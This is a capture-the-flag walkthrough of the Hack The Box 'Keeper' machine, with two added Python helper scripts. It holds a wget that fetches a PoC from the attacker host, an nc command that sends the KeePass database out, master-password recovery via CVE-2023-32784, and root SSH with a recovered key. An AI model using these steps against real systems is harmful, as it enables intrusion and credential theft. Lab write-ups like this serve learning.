HTB Keeper: Formal Writeup

Safwan Luban
Feb 14, 2024


Synopsis:

Keeper is an easy Linux machine that hosts the Request Ticket (RT 4.4.4) web application. A password for the user lnorgaard was found in the web application and was then used to log into the host via SSH. After logging in as lnorgaard, a zip file for the KeePass application was found. Unzipping the file revealed a memory dump file and a database file. KeePass memory dumps are affected by CVE-2023-32784, which allows an attacker to recover the master password. After cracking the database file, a PuTTY key was found. This key was then converted into an OpenSSH key, which allowed the attacker to compromise the entire host.

Active Recon:

The attacker began with a basic nmap scan. The initial scan showed two open ports: the usual SSH port and an HTTP port. The HTTP server was running nginx 1.18.0.

┌──(toothless5143@kali)-[~]
└─$ sudo nmap -Pn -sV -sC --min-rate=5000 -T4 10.10.11.227

[sudo] password for toothless5143:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-05 23:07 CDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.29% done; ETC: 23:07 (0:00:00 remaining)
Nmap scan report for 10.10.11.227
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds

Upon visiting the web server, a VHOST named tickets.keeper.htb was discovered.

Discovering the webapp.

So the attacker added the VHOST to /etc/hosts.

┌──(toothless5143@kali)-[~]
└─$ echo "10.10.11.227 tickets.keeper.htb" | sudo tee -a /etc/hosts

After visiting the discovered VHOST, the attacker found that it is a request ticket web application. The page also revealed its version.

RT 4.4.4+dfsg-2ubuntu1

Vulnerability Analysis & Exploitation:

While manually exploring the web app, it was found that the user lnorgaard had problems with their KeePass and had submitted a memory dump of their KeePass via a ticket. Upon visiting the user’s profile, a comment containing the user’s password was found.

Discovering the user password.

Using the found password, the attacker successfully logged in via SSH.

┌──(toothless5143@kali)-[~]
└─$ ssh lnorgaard@10.10.11.227

lnorgaard@10.10.11.227's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
Last login: Wed Sep 6 06:42:16 2023 from 10.10.14.37
lnorgaard@keeper:~$

After gaining the initial foothold the user flag was found from the file
/home/lnorgaard/user.txt.

Post Exploitation:

Inside the user’s home directory a zip file named RT30000.zip was found. After unzipping the file, a KeePass database file and a memory dump file were found. Research showed that KeePass is affected by CVE-2023-32784, which allows an attacker to recover the master password from the .dmp memory dump. To investigate further, the attacker transferred a PoC script to the target host using a Python HTTP server.

Starting the python web server:

┌──(toothless5143@kali)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Downloading the file and executing on the target host:

# Downloading the file
lnorgaard@keeper:~$ wget http://10.10.14.34/poc.py

# Giving execution permission
lnorgaard@keeper:~$ chmod +x poc.py

# Executing the script
lnorgaard@keeper:~$ python3 poc.py KeePassDumpFull.dmp
2023-09-06 08:51:35,828 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de

Privilege Escalation:

As the script itself notes, it only produces possible character combinations. Searching for the recovered term on Google revealed that it is a dessert from Denmark, “rødgrød med fløde”. The attacker then decided to crack the database file using https://app.keeweb.info/.
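The PoC output above has a useful structure that is easy to miss when reading it line by line: the first, sixth and fifteenth positions are never recovered (printed as ●), and the second position is where the candidates disagree. The following script is an added example, not the PoC and not the author's code; it parses those "Possible password" lines, collapses them into one mask, and checks a constructed wordlist against the mask. The function names (parse_candidates, merge_candidates, matches_mask, shortlist) and the sample wordlist are assumptions for the illustration; the candidate lines are copied from the output shown above.

```python
import re

# Constructed sample: the "Possible password" lines as the PoC printed them on
# this box. The PoC prints ● for a position it could not recover at all.
POC_OUTPUT = """\
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
"""

UNKNOWN = "●"
LINE_RE = re.compile(r"^Possible password: (.+)$")


def parse_candidates(text):
    """Extract the candidate strings from PoC output; any other line is ignored."""
    cands = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            cands.append(m.group(1))
    return cands


def merge_candidates(cands):
    """Collapse equal-length candidates into one mask plus per-position notes.

    A position keeps its character only when every candidate agrees on it and
    it is not ●; otherwise it becomes '?'. The notes map each '?' position to
    None (never recovered) or to the sorted list of characters the PoC guessed.
    """
    if not cands:
        raise ValueError("no candidates")
    n = len(cands[0])
    if any(len(c) != n for c in cands):
        raise ValueError("candidates differ in length")
    mask, notes = [], {}
    for i in range(n):
        chars = {c[i] for c in cands}
        if chars == {UNKNOWN}:
            mask.append("?")
            notes[i] = None
        elif len(chars) == 1:
            mask.append(chars.pop())
        else:
            mask.append("?")
            notes[i] = sorted(chars - {UNKNOWN})
    return "".join(mask), notes


def matches_mask(mask, word):
    """True if word has the mask's length and agrees on every fixed position.

    '?' positions are not constrained: the PoC's guesses for a disagreeing
    position are unreliable (on this box none of the 13 guesses is the real ø).
    """
    if len(word) != len(mask):
        return False
    return all(m == "?" or m == w for m, w in zip(mask, word))


def shortlist(mask, words):
    """Return the words from a list that fit the mask."""
    return [w for w in words if matches_mask(mask, w)]


# Constructed wordlist for the demonstration (not from the page).
SAMPLE_WORDS = ["rødgrød med fløde", "rodgrod med flode", "password123", "æblegrød med fløde"]

if __name__ == "__main__":
    mask, notes = merge_candidates(parse_candidates(POC_OUTPUT))
    print("mask:", mask)
    print("notes:", notes)
    print("shortlist:", shortlist(mask, SAMPLE_WORDS))
```

Run stand-alone the script prints the mask ??dgr?d med fl?de, showing that 13 of the 17 characters are fixed by the dump; the remaining human step in the writeup (recognising the Danish dish) is what resolves the four unknown positions. The per-position notes are worth keeping for a report: the 13 different guesses at position 1 document how noisy the PoC's output is for that slot.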

Exfiltrating the database file:

# On the attacker's host
┌──(toothless5143@kali)-[~]
└─$ nc -l -p 8000 > passcodes.kdbx

# On the target host
lnorgaard@keeper:~$ nc -w 3 10.10.14.34 8000 < passcodes.kdbx

Upon finally cracking the database file, the attacker found a PuTTY SSH key for the root user. The process of converting the PuTTY key into an OpenSSH private key is shown below.
1. First save the notes of the database entry into a .txt file.
2. Run puttygen putty.txt -O private-openssh -o id_rsa to convert the PuTTY key into an OpenSSH key.
3. Change the key's permissions with chmod 600 id_rsa.
4. Log in as the root user using SSH.

┌──(toothless5143@kali)-[~]
└─$ ssh root@10.10.11.227 -i id_rsa

root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
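Steps 2 and 3 above fail silently in different ways when done out of order: ssh will not read a PPK file at all, and it refuses an OpenSSH key whose mode is readable by group or others. The script below is an added example, not from the page's author; it classifies a key file by its first line and mirrors ssh's permission check (mode & 077 must be zero), then walks the two checks over constructed stub files. The function names (key_format, permissions_ok, check_key, demo) are assumptions; the header strings are the real first lines of PPK, OpenSSH and PEM key files, and the stub bodies contain no key material.

```python
import os
import stat
import tempfile

PUTTY_MAGIC = "PuTTY-User-Key-File-"            # PPK v2/v3 files start like this
OPENSSH_MAGIC = "-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_MAGICS = (
    "-----BEGIN RSA PRIVATE KEY-----",
    "-----BEGIN EC PRIVATE KEY-----",
    "-----BEGIN PRIVATE KEY-----",
)


def key_format(path):
    """Classify a private-key file by its first line."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        first = f.readline().strip()
    if first.startswith(PUTTY_MAGIC):
        return "putty"
    if first == OPENSSH_MAGIC:
        return "openssh"
    if first in PEM_MAGICS:
        return "pem"
    return "unknown"


def permissions_ok(path):
    """Same test ssh applies before using a key: no group/other permission bits."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & 0o077) == 0


def check_key(path):
    """Report format, whether puttygen conversion is still needed, and usability."""
    fmt = key_format(path)
    perms = permissions_ok(path)
    return {
        "format": fmt,
        "needs_puttygen": fmt == "putty",
        "permissions_ok": perms,
        "usable_by_ssh": fmt in ("openssh", "pem") and perms,
    }


def demo():
    """Run the checks on constructed stub files (no real keys) and return them."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        # Constructed stub standing in for the notes saved as putty.txt (step 1).
        ppk = os.path.join(d, "putty.txt")
        with open(ppk, "w") as f:
            f.write("PuTTY-User-Key-File-3: ssh-rsa\nEncryption: none\n"
                    "Comment: constructed stub\n")
        os.chmod(ppk, 0o644)
        results["ppk_644"] = check_key(ppk)

        # Constructed stub standing in for the converted id_rsa (step 2),
        # first with the default 0644 mode, then after chmod 600 (step 3).
        converted = os.path.join(d, "id_rsa")
        with open(converted, "w") as f:
            f.write("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                    "constructed stub, not a real key\n"
                    "-----END OPENSSH PRIVATE KEY-----\n")
        os.chmod(converted, 0o644)
        results["id_rsa_644"] = check_key(converted)
        os.chmod(converted, 0o600)
        results["id_rsa_600"] = check_key(converted)
    return results


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The format check is deliberately header-only: it is enough to tell whether puttygen is still required, without parsing either key format. The permission check uses the mode bits from stat, so it gives the same answer whether or not the caller is root.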

The root flag was obtained from /root/root.txt, and the host was fully pwned by the attacker.

Signing out,
- Toothless
